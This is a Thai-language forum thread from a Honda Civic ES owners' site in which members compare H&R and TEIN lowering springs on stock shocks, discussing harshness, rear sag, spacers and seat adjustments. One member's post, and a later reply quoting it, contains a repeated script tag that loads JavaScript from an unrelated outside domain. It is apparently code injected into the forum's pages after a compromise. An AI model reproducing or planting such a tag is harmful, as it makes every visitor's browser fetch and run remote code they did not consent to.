ตอบ
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 31 ตุลา 2012 11:24 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ.. ว่าเอาอันไหนดี อ่านกระทู้เก่าๆ แล้วสับสน ล้อ 215/45 R17 (ไม่ได้ติดแก๊ส) ใช้โช๊คเดิม
1.อันไหนกระด้างกว่ากัน เช่น ตกหลุม ลูกระนาด
2.อันไหนใส่แล้วท้ายห้อย
3.ถ้าทั้ง 2 ท้อยห้อยเหมือนกัน สามารถเลื่อนเบ้าหน้าเพื่อแก้ปัญหาได้มั้ย
4.อันไหนใส่แล้วปัญหาน้อยที่สุด คือ ใส่แล้วจบ ไม่ต้องทำโน่นนี่จุกจิก

ขอบคุณครับ ช่วยฟันธงหน่อยครับ..
ได้รับคำขอบคุณจาก: yoyosonic  nu_es_05 
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 31 ตุลา 2012 11:56 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
ตอบข้อ 3 และ 4

3.ถ้าท้ายห้อย ก็ลอง สเปเซอร์
4.สปริงไม่มีปัญหาครับส่วนมากจะเป็นที่ตัวโช๊ค ตัวสปริงเอง ใส่แล้วจบทุกตัวครับ
ได้รับคำขอบคุณจาก: poppy  nu_es_05 
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 31 ตุลา 2012 11:59 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
LifeFate พิมพ์ว่า:
ตอบข้อ 3 และ 4

3.ถ้าท้ายห้อย ก็ลอง สเปเซอร์
4.สปริงไม่มีปัญหาครับส่วนมากจะเป็นที่ตัวโช๊ค ตัวสปริงเอง ใส่แล้วจบทุกตัวครับ




ข้อ 3 ถ้าไม่รอง สเปเซอร์ แต่เลื่อนเบ้าหน้าแทน จะได้มั้ยครับ หรือถ้าเลื่อนแล้วก็ยังห้อยอยู่ครับ
ได้รับคำขอบคุณจาก: nu_es_05 
Meemangkang


ชื่อเล่น: แอร์

เข้าร่วม: 01 เมษา 2010
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1430
ให้คำขอบคุณ: 1329

ที่อยู่: รามอินทรา 109.....มีนบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 31 ตุลา 2012 20:01 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
ตอบข้อ
1.กระด้างพอๆกัน ถ้าจับกับโช้คเดิม
2.ไม่แน่ใจ แต่ผมใส่H&R ก็ไม่ห้อยนะ
3.เลื่อนได้ครับ ทั้ง 2 ตัว
4.ปัญหาไม่มีหรอกครับ อยู่ที่ว่าเรารับได้หรือเปล่ากับความนุ่มนวลที่หายไป ส่วนใหญ่เปลี่ยนแค่สปริงไม่ค่อยจบครับ จะค่อยๆขยับขึ้นไปเรื่อยๆอะครับ หรือถ้างบน้อยก็อาจจะจบก็ได้ครับ...
ได้รับคำขอบคุณจาก: poppy  yoyosonic  nu_es_05 
wutdy


ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

ปี: 2001
พุธ, 31 ตุลา 2012 20:21 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
1.ไม่แน่ใจว่าอันไหนแข็งกว่ากัน ผมเคยนั่ง tein แข็งกว่าเดิมนิดนึง
2.H&R ท้ายห้อยมากกว่าเพราะหน้าหลัง จะโหลดลงเท่ากัน แล้วก็จะเตี้ยกว่าด้วย (น่าจะลงเกือบ 2 นิ้ว) ส่วน Tein หน้าจะลง 1.4 นิ้ว หลังลง 1.2 นิ้ว
3.ทำได้ทั้ง 2 ตัวไม่ว่าจะเป็นเลื่อนเบ้า หรือรองสเปเสอร์
4.สปริงทั้ง 2 ยี่ห้อมาตรฐานดีอยู่แล้ว เสียยากครับ
ได้รับคำขอบคุณจาก: poppy  HankMan  yoyosonic  nu_es_05 
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 พฤศจิกา 2012 10:34 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
ขอบคุณทุกคนมากครับ
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 พฤศจิกา 2012 11:06 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
1. ไม่เคยนั่ง tein ครับ แต่รถผมใส่ H&R อยู่ครับ กระด้างกว่าเดิมมั้ยครับ แน่นอนครับ แต่ไม่เกินจุดที่ผมรับได้ครับ
2.เตี้ยมั้ย เตี้ยกว่าเทอินครับเพราะลงไปเกือบๆ 2 นิ้วครับ หน้าหลังลงเท่ากัน ถ้าไม่ใส่ตัวปรับแคมเบอร์หลัง ท้ายห้อยเพราะล้อแบะออกมากกว่าหน้าครับ
3. เลื่อนเบ้า ไม่ได้ทำครับ แต่รถผมรองสเปเซอร์หลัง 1 นิ้ว ไม่สวยครับ แต่ยอมเพราะว่ารถติดแก๊ส ไม่งั้นเติมแก๊สกับน้ำมันเต็ม จั้มแรงๆ ครูดซุ้มครับ ถ้าจะรองสเปเซอร์แนะนำให้เจียร์ออกเหลือครึ่งนิ้วจะสวยสุดครับ ถ้าไม่รองก้อใส่แคมเบอร์ปรับได้ หน้าหลังจะเท่ากันคือ 2 นิ้วสอดได้ครับ รถผมใส่ยาง 204/45/17 ครับ
หวังว่าคงได้ข้อมูลประกอบการตัดสินใจเพิ่มขึ้นนะครับ
ได้รับคำขอบคุณจาก: poppy  yoyosonic  nu_es_05 
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 พฤศจิกา 2012 11:08 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
HankMan พิมพ์ว่า:
1. ไม่เคยนั่ง tein ครับ แต่รถผมใส่ H&R อยู่ครับ กระด้างกว่าเดิมมั้ยครับ แน่นอนครับ แต่ไม่เกินจุดที่ผมรับได้ครับ
2.เตี้ยมั้ย เตี้ยกว่าเทอินครับเพราะลงไปเกือบๆ 2 นิ้วครับ หน้าหลังลงเท่ากัน ถ้าไม่ใส่ตัวปรับแคมเบอร์หลัง ท้ายห้อยเพราะล้อแบะออกมากกว่าหน้าครับ
3. เลื่อนเบ้า ไม่ได้ทำครับ แต่รถผมรองสเปเซอร์หลัง 1 นิ้ว ไม่สวยครับ แต่ยอมเพราะว่ารถติดแก๊ส ไม่งั้นเติมแก๊สกับน้ำมันเต็ม จั้มแรงๆ ครูดซุ้มครับ ถ้าจะรองสเปเซอร์แนะนำให้เจียร์ออกเหลือครึ่งนิ้วจะสวยสุดครับ ถ้าไม่รองก้อใส่แคมเบอร์ปรับได้ หน้าหลังจะเท่ากันคือ 2 นิ้วสอดได้ครับ รถผมใส่ยาง 204/45/17 ครับ
หวังว่าคงได้ข้อมูลประกอบการตัดสินใจเพิ่มขึ้นนะครับ



ขอบคุณมากครับ
arsenal


ชื่อเล่น: ไม้

เข้าร่วม: 06 กรกฎา 2010
ตอบ: 3035

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2300
ให้คำขอบคุณ: 4312

ที่อยู่: เพชรบุรี หัวหิน ประจวบ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 1 พฤศจิกา 2012 12:23 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
H&R มันเตี้ยกว่า TEIN ไหม อ่ะ อยากรู้ 
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: nu_es_05 
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 พฤศจิกา 2012 12:39 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
rsr โหดๆ เลยครับ
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 พฤศจิกา 2012 13:23 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
arsenal พิมพ์ว่า:
H&R มันเตี้ยกว่า TEIN ไหม อ่ะ อยากรู้ 
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">




เตี้ยกว่าครับ
es458


ชื่อเล่น: เอก

เข้าร่วม: 17 พฤศจิกา 2010
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 47
ให้คำขอบคุณ: 87

ที่อยู่: รังสิต
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 1 พฤศจิกา 2012 14:38 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
ผมใส่ ไอบัค นุ่มหนึบ โช๊คหน้าเดิมๆ โช็คหลังอัดน้ำมันเบอร์40ครับแล้วก้อเลื่อนเบ้าขึ้นครึ่งนิ้วครับเพราะติดแก๊ส ขับช้ากระด้างกว่าเดิมนิดหน่อยรับได้คับ ขับเร็ว120+ยังนิ่งๆไม่โยน โดดคอสะพานไม่ย้วย สเต็ปนี้ถือว่าผ่านสำหรับผมนะ..ไว้เป็นข้อมูลครับ งบน้อยไม่ได้ใช้โช็คเทพ..แฮ่ๆ
ได้รับคำขอบคุณจาก: poppy  nu_es_05  yoyosonic 
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 พฤศจิกา 2012 14:39 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
es458 พิมพ์ว่า:
ผมใส่ ไอบัค นุ่มหนึบ โช๊คหน้าเดิมๆ โช็คหลังอัดน้ำมันเบอร์40ครับแล้วก้อเลื่อนเบ้าขึ้นครึ่งนิ้วครับเพราะติดแก๊ส ขับช้ากระด้างกว่าเดิมนิดหน่อยรับได้คับ ขับเร็ว120+ยังนิ่งๆไม่โยน โดดคอสะพานไม่ย้วย สเต็ปนี้ถือว่าผ่านสำหรับผมนะ..ไว้เป็นข้อมูลครับ งบน้อยไม่ได้ใช้โช็คเทพ..แฮ่ๆ




ผมก็งบน้อยเหมือนกันครับ
yoyosonic


เข้าร่วม: 20 กรกฎา 2011
ตอบ: 1079

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 3432

ที่อยู่: กทม.
ปี: 2002
พฤหัส, 1 พฤศจิกา 2012 15:07 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
wutdy พิมพ์ว่า:
1.ไม่แน่ใจว่าอันไหนแข็งกว่ากัน ผมเคยนั่ง tein แข็งกว่าเดิมนิดนึง
2.H&R ท้ายห้อยมากกว่าเพราะหน้าหลัง จะโหลดลงเท่ากัน แล้วก็จะเตี้ยกว่าด้วย (น่าจะลงเกือบ 2 นิ้ว) ส่วน Tein หน้าจะลง 1.4 นิ้ว หลังลง 1.2 นิ้ว
3.ทำได้ทั้ง 2 ตัวไม่ว่าจะเป็นเลื่อนเบ้า หรือรองสเปเสอร์
4.สปริงทั้ง 2 ยี่ห้อมาตรฐานดีอยู่แล้ว เสียยากครับ




+1
ได้รับคำขอบคุณจาก: poppy 
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 1 พฤศจิกา 2012 15:35 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
H&R งบน้อย กะโช๊คเดิมครับ มีตังจะจัดโช๊คดีๆราคาถูก

ฟีลกะด้างเวลาเจอหลุม ทางขรุขระ รับได้จบเลย

ท้ายห้อย ติดแก๊ส รองสเปเซอร์เอา
ได้รับคำขอบคุณจาก: poppy  yoyosonic 
supra200


ชื่อเล่น: บอย

เข้าร่วม: 04 สิงหา 2011
ตอบ: 238

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 509
ให้คำขอบคุณ: 70

ที่อยู่: เกาะเมืองพระนครศรีอยุธยา
ปี: 2003
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 1 พฤศจิกา 2012 21:38 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
^^ ผมใช้แต่ตัวเขียวๆ  มาสามคันและครับ 
ได้รับคำขอบคุณจาก: poppy 
aea


ชื่อเล่น: เอ้

เข้าร่วม: 15 มีนา 2011
ตอบ: 930

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 361
ให้คำขอบคุณ: 691

ที่อยู่: MIDDLEMARKET DONMUANG
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 3 พฤศจิกา 2012 12:21 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
สองยี่ห้อที่ว่าใส่กับโช๊คเดิมโอเคครับ แต่ถ้าเปนโช๊ค DC5 กับสองยี่ห้อไม่เนะนำครับ
ลองแล้ว 4 ยี่ห้อครับ ต้องจบที่สปริงอ่อนอย่าง ESPELER รับรองเนียนครับ นุ่มๆหนึบๆ(อัดน้ำมันใหม่นะครับ)
ได้รับคำขอบคุณจาก: nu_es_05  poppy 
nu_es_05


ชื่อเล่น: นุ

เข้าร่วม: 10 มิถุนา 2010
ตอบ: 1555

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1058
ให้คำขอบคุณ: 5949

ที่อยู่: สุขุมวิท 101/1
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 3 พฤศจิกา 2012 18:42 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
tein คับลองดู
ได้รับคำขอบคุณจาก: poppy 
DRINK


เข้าร่วม: 04 ตุลา 2008
ตอบ: 3856

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ที่อยู่: Paris + Bangkok + Uttaradit + Phitsanulok
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 3 พฤศจิกา 2012 19:10 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
เคยใช้มาสองยี่ห้อนี้ ผมชอบ H&R มากเลยครับ มากกว่า TEIN เยอะ แล้วสปริงมันก็หน้าทิ่มกว่าหลังหน่อยนึงด้วย
ใช้มานานกว่า TEIN ไม่เจอข้อที่ไม่ชอบเลย แต่พอใช้ TEIN ได้สองสามเดือน เกิดอาการไม่ชอบอย่างแรง จนต้องหา
โช๊คดีๆมาใส่แทนเลยครับ ส่วนคำถามต่างๆแล้วแต่การขับด้วยครับ ถ้าชอบดิบๆ แนะนำ H&R พอหาฟิวส์ได้ เพราะมันแค่สปริงโหลด
ไม่ใช่โช๊คทั้งแท่ง 
ได้รับคำขอบคุณจาก: poppy  yoyosonic  nu_es_05 
slum


ชื่อเล่น: เอ็ม

เข้าร่วม: 13 มกรา 2011
ตอบ: 1070

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 859
ให้คำขอบคุณ: 345

ที่อยู่: บ้านโป่ง<=>มหาชัย<=>สุทธิสาร
ปี: 2003
อาทิตย์, 4 พฤศจิกา 2012 01:44 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
เก็บๆๆ
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
อาทิตย์, 4 พฤศจิกา 2012 06:24 - ระหว่างสปริง H&R กับ TEIN ช่วยฟันธงหน่อยครับ..
H&R กับโช้คเดิมก็พอได้นะครับ...แต่กระด้างไปหน่อย...ส่วนความสูงน่าจะต่ำกว่าสปริงแต่งอื่น ๆ.....ครับ
ได้รับคำขอบคุณจาก: poppy 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.